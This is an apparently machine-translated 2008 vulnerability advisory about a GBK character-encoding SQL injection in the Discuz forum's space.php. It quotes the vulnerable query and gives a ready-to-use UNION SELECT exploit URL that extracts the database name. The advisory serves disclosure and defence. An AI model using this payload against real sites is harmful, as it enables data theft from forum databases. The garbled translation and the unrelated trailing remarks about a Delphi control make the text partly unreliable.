Lucene search

HistoryAug 17, 2008 - 12:00 a.m.

Discuz space. php injection vulnerability analysis-vulnerability warning-the black bar safety net


$member = $db->fetch_first(“SELECT m., mf., u. grouptitle, u. type, u. creditshigher, u. creditslower, u. readaccess,
u. color AS groupcolor, u. stars AS groupstars, u. allownickname, u. allowuseblog, r. ranktitle,
r. color AS rankcolor, r. stars AS rankstars $oltimeadd1
FROM {$tablepre}members m
LEFT JOIN {$tablepre}memberfields mf ON mf. uid=m. uid
LEFT JOIN {$tablepre}usergroups u ON u. groupid=m. groupid
LEFT JOIN {$tablepre}ranks r ON m. posts>=r. postshigher
WHERE “. ($uid ? “m. uid=‘$uid’” : “m. username=‘$username’”).” ORDER BY r. postshigher DESC LIMIT 1”);

discuz. space function space.php

The query contains the username value of the query,through the coding structure can produce injection vulnerability in the UTF-8 does not exist for this vulnerability

Recently often appear similar coding injection vulnerability,this is because, for example gbk, this encoding under the php server is not a good filter’number so the resulting vulnerability occurrence,and use UTF-8 encoding of the program does not have this problem,does not produce a encoding conversion error,the quotation marks got the intact filter,to eliminate the coding injection vulnerability occurs.

Exploit method:

http:// 地址 /space.php?username=%cf’%20UNION%20Select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,database(),8 3/*

Bring software screenshot to rewrite the 2 sides…operation of the delphi TGIFIMAGE control didn’t installed well~tired…

Download can go directly to